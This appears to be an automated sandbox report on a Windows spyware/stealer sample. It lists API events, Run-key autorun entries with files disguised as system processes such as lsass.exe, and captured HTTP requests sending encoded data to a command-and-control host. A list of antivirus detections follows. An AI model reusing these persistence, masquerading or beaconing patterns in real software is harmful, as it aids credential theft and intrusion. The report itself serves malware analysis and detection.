ShellExecuteExW July 30, 2021, 10:19 a.m.	show_type: 0 filepath_r: C:\Windows\Prefetch\ReadyBoot\lsass.exe parameters: filepath: C:\Windows\Prefetch\ReadyBoot\lsass.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 30, 2021, 10:19 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 30, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 30, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Installs itself for autorun at Windows startup (8 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mobsync	reg_value	"C:\Documents and Settings\mobsync.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchProtocolHost	reg_value	"C:\Python27\click\click\click_image\SearchProtocolHost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pw	reg_value	"C:\GPKI\pw.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass	reg_value	"C:\Windows\Prefetch\ReadyBoot\lsass.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\Sandbox\test22\DefaultBox\drive\C\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\taskhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pw	reg_value	"C:\Python27\LICENSE\pw.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\Windows\System32\aitagent\taskhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DhcpcommonFontsession	reg_value	"C:\tmpogzukl\lib\common\DhcpcommonFontsession.exe"

Network communications indicative of possible code injection originated from the process lsass.exe (4 events)

Time & API	Arguments	Status	Return
send July 30, 2021, 10:20 a.m.	buffer: GET /control.php?lF8KllZ=rEiSsOnQXHCc8kKLp7&2j5PKlq1u=opZOW&c94b13721d27475b87989d1218641657=8a5330c20f60bd9030c0fb85bd67f5dd&6d3d78b8326f23a9c284d79a7473fb93=QNjhTO4Q2NiJWMjRWO1IjYwIjM5ADNzQWMiVWNxUjNxIzMmJmY3QGO&lF8KllZ=rEiSsOnQXHCc8kKLp7&2j5PKlq1u=opZOW HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 Host: api.samp-loader.ru Connection: Keep-Alive socket: 964 sent: 487	1	487
send July 30, 2021, 10:20 a.m.	buffer: GET /control.php?lF8KllZ=rEiSsOnQXHCc8kKLp7&2j5PKlq1u=opZOW&6b8b4347da47dc2b696be018eded6f69=wN3IzYlVGN1cTN5ETZlZWNxUGZ3UDN0kTOwMDZxEjZzQ2NhZjM1UGNwgjN3gjM3gzMxIjNwkjM&6d3d78b8326f23a9c284d79a7473fb93=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&a7e9471faeb4abd8b84476365044b7b2=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiU2N5ETZzcTYlZGZ0U2MyI2MyMGNhdTM1EDZmFmNyAzMiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiEGNmJWYwATN0YGNxM2NxMTNkZ2NxUjNhlTMllTM5E2Mis3W&397c91ac345c79dff31763c1f8c0fb27=d1nIiojI0gDMzYzMzQ2Y1MmZ0QWY5UjNjVjZkFGO3QzNyQjMwYjIsICM0UGN2kTNhR2Y2EmNklDN2Q2MjZmNzI2Y5E2MidTY2cTZ3gTNiFWZiojIldTOxU2M3EWZmRGNlNjMiNjMjRTY3ETNxQmZhZjMwMjIsISNwYWNycDN1AzNlVWN4MGNyMGNlBzNyYGM2MjZ1Y2Y0YmMhdDZ4IzNiojIhRjZiFGMwUDNmRTMjdTMzUDZmdTM1YTY5ETZ5ETOhNjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0UZxmSzIGTCNUYwY1MiRlQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzl0UPRTRU1UdjpWT4dXaNhXQU5UdjpXTp9maJpWOHJWa3lWSTR3aJZTSTVWeS5mYxkjMZl2dpl0cWNjYs5EbJZTSpJmdsJjWspkbJNXSTRmbxMVW3RWbiZnTslkNJNVZwwmMZl2dpl0dVRVT1FleNhHND90dJpGTxMGVNl2bql0ds1WS3AnaJZnWtJmSCh1UpdXaJlXSERmeWdEZp9maJxWMXl1TKhlW6ZFbJNXS5FVUxkWT5FVMVZkUslkNJNlW0ZUbURkQsl0cJNVT4RTeNVXUqlkNJl2YspFbjxmWuNGbOxWSzlUallEZF1EN0kWTnFURJZlQxE1ZBRUTwcGVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSDJ0QNdGMDl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDOwMjNzMDZjVzYmRDZhlTN2MWNmRWY4cDN3IDNyAjNiwiI1AjNzkjZ0MTYiNGZxQDZzMjZmNjY3QjZ1ITM3UTMiZzN3YmYyczYxIiOiU2N5ETZzcTYlZGZ0U2MyI2MyMGNhdTM1EDZmFmNyAzMiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiEGNmJWYwATN0YGNxM2NxMTNkZ2NxUjNhlTMllTM5E2Mis3W HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 Host: api.samp-loader.ru socket: 964 sent: 2082	1	2082
send July 30, 2021, 10:20 a.m.	buffer: GET /control.php?lF8KllZ=rEiSsOnQXHCc8kKLp7&2j5PKlq1u=opZOW&6b8b4347da47dc2b696be018eded6f69=wN3IzYlVGN1cTN5ETZlZWNxUGZ3UDN0kTOwMDZxEjZzQ2NhZjM1UGNwgjN3gjM3gzMxIjNwkjM&6d3d78b8326f23a9c284d79a7473fb93=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&a7e9471faeb4abd8b84476365044b7b2=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiU2N5ETZzcTYlZGZ0U2MyI2MyMGNhdTM1EDZmFmNyAzMiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiEGNmJWYwATN0YGNxM2NxMTNkZ2NxUjNhlTMllTM5E2Mis3W&397c91ac345c79dff31763c1f8c0fb27=d1nIiojI0gDMzYzMzQ2Y1MmZ0QWY5UjNjVjZkFGO3QzNyQjMwYjIsICM0UGN2kTNhR2Y2EmNklDN2Q2MjZmNzI2Y5E2MidTY2cTZ3gTNiFWZiojIldTOxU2M3EWZmRGNlNjMiNjMjRTY3ETNxQmZhZjMwMjIsISNwYWNycDN1AzNlVWN4MGNyMGNlBzNyYGM2MjZ1Y2Y0YmMhdDZ4IzNiojIhRjZiFGMwUDNmRTMjdTMzUDZmdTM1YTY5ETZ5ETOhNjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0UZxmSzIGTCNUYwY1MiRlQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzl0UPRTRU1UdjpWT4dXaNhXQU5UdjpXTp9maJpWOHJWa3lWSTR3aJZTSTVWeS5mYxkjMZl2dpl0cWNjYs5EbJZTSpJmdsJjWspkbJNXSTRmbxMVW3RWbiZnTslkNJNVZwwmMZl2dpl0dVRVT1FleNhHND90dJpGTxMGVNl2bql0ds1WS3AnaJZnWtJmSCh1UpdXaJlXSERmeWdEZp9maJxWMXl1TKhlW6ZFbJNXS5FVUxkWT5FVMVZkUslkNJNlW0ZUbURkQsl0cJNVT4RTeNVXUqlkNJl2YspFbjxmWuNGbOxWSzlUallEZF1EN0kWTnFURJZlQxE1ZBRUTwcGVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSDJ0QNdGMDl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDOwMjNzMDZjVzYmRDZhlTN2MWNmRWY4cDN3IDNyAjNiwiI1AjNzkjZ0MTYiNGZxQDZzMjZmNjY3QjZ1ITM3UTMiZzN3YmYyczYxIiOiU2N5ETZzcTYlZGZ0U2MyI2MyMGNhdTM1EDZmFmNyAzMiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiEGNmJWYwATN0YGNxM2NxMTNkZ2NxUjNhlTMllTM5E2Mis3W HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 Host: api.samp-loader.ru socket: 964 sent: 2082	1	2082
send July 30, 2021, 10:20 a.m.	buffer: GET /control.php?lF8KllZ=rEiSsOnQXHCc8kKLp7&2j5PKlq1u=opZOW&6b8b4347da47dc2b696be018eded6f69=wN3IzYlVGN1cTN5ETZlZWNxUGZ3UDN0kTOwMDZxEjZzQ2NhZjM1UGNwgjN3gjM3gzMxIjNwkjM&6d3d78b8326f23a9c284d79a7473fb93=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&a7e9471faeb4abd8b84476365044b7b2=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiU2N5ETZzcTYlZGZ0U2MyI2MyMGNhdTM1EDZmFmNyAzMiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiEGNmJWYwATN0YGNxM2NxMTNkZ2NxUjNhlTMllTM5E2Mis3W&397c91ac345c79dff31763c1f8c0fb27=d1nIiojI0gDMzYzMzQ2Y1MmZ0QWY5UjNjVjZkFGO3QzNyQjMwYjIsICM0UGN2kTNhR2Y2EmNklDN2Q2MjZmNzI2Y5E2MidTY2cTZ3gTNiFWZiojIldTOxU2M3EWZmRGNlNjMiNjMjRTY3ETNxQmZhZjMwMjIsISNwYWNycDN1AzNlVWN4MGNyMGNlBzNyYGM2MjZ1Y2Y0YmMhdDZ4IzNiojIhRjZiFGMwUDNmRTMjdTMzUDZmdTM1YTY5ETZ5ETOhNjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0UZxmSzIGTCNUYwY1MiRlQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzl0UPRTRU1UdjpWT4dXaNhXQU5UdjpXTp9maJpWOHJWa3lWSTR3aJZTSTVWeS5mYxkjMZl2dpl0cWNjYs5EbJZTSpJmdsJjWspkbJNXSTRmbxMVW3RWbiZnTslkNJNVZwwmMZl2dpl0dVRVT1FleNhHND90dJpGTxMGVNl2bql0ds1WS3AnaJZnWtJmSCh1UpdXaJlXSERmeWdEZp9maJxWMXl1TKhlW6ZFbJNXS5FVUxkWT5FVMVZkUslkNJNlW0ZUbURkQsl0cJNVT4RTeNVXUqlkNJl2YspFbjxmWuNGbOxWSzlUallEZF1EN0kWTnFURJZlQxE1ZBRUTwcGVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSDJ0QNdGMDl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDOwMjNzMDZjVzYmRDZhlTN2MWNmRWY4cDN3IDNyAjNiwiI1AjNzkjZ0MTYiNGZxQDZzMjZmNjY3QjZ1ITM3UTMiZzN3YmYyczYxIiOiU2N5ETZzcTYlZGZ0U2MyI2MyMGNhdTM1EDZmFmNyAzMiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiEGNmJWYwATN0YGNxM2NxMTNkZ2NxUjNhlTMllTM5E2Mis3W HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 Host: api.samp-loader.ru socket: 964 sent: 2082	1	2082

Created a process named as a common system process (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW July 30, 2021, 10:19 a.m.	thread_identifier: 2672 thread_handle: 0x0000000000000264 process_identifier: 2668 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\Prefetch\ReadyBoot\lsass.exe track: 1 command_line: "C:\Windows\Prefetch\ReadyBoot\lsass.exe" filepath_r: C:\Windows\Prefetch\ReadyBoot\lsass.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000488	1	1	0
ShellExecuteExW July 30, 2021, 10:19 a.m.	show_type: 0 filepath_r: C:\Windows\Prefetch\ReadyBoot\lsass.exe parameters: filepath: C:\Windows\Prefetch\ReadyBoot\lsass.exe	1	1	0

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Lionic	Trojan.MSIL.Stealer.l!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.MSIL.Basic.8.Gen
CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
Qihoo-360	Win32/TrojanSpy.Generic.HwMA5vIA
ALYac	Trojan.MSIL.Basic.8.Gen
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Alibaba	TrojanSpy:Win32/Stealer.370706a3
K7GW	Spyware ( 004bf53c1 )
Cybereason	malicious.2751bd
Arcabit	Trojan.MSIL.Basic.8.Gen
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Spy.Agent.AES
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Packed.Uztuby-9853721-0
Kaspersky	HEUR:Trojan-Spy.MSIL.Stealer.gen
BitDefender	Trojan.MSIL.Basic.8.Gen
Avast	Win32:KeyloggerX-gen [Trj]
Ad-Aware	Trojan.MSIL.Basic.8.Gen
Sophos	Mal/SpyNoon-A
Comodo	TrojWare.Win32.UMal.aucca@0
DrWeb	BackDoor.QuasarNET.3
TrendMicro	TROJ_GEN.R002C0DGT21
McAfee-GW-Edition	GenericRXPF-LQ!999142F2751B
FireEye	Generic.mg.999142f2751bd4d2
Emsisoft	Trojan.MSIL.Basic.8.Gen (B)
SentinelOne	Static AI - Malicious PE
MAX	malware (ai score=100)
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:Win32/Spy.BYF!MTB
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Stealer.gen
GData	Trojan.MSIL.Basic.8.Gen
AhnLab-V3	Trojan/Win.Spy.C4559049
McAfee	GenericRXPF-LQ!999142F2751B
Malwarebytes	Spyware.KeyLogger
TrendMicro-HouseCall	TROJ_GEN.R002C0DGT21
Ikarus	Win32.Outbreak
eGambit	Unsafe.AI_Score_100%
Fortinet	MSIL/Agent.BYF!tr.spy
BitDefenderTheta	Gen:NN.ZemsilF.34050.Em0@a0h7Qyji
AVG	Win32:KeyloggerX-gen [Trj]
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_90% (W)

DhcpcommonFontsession.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All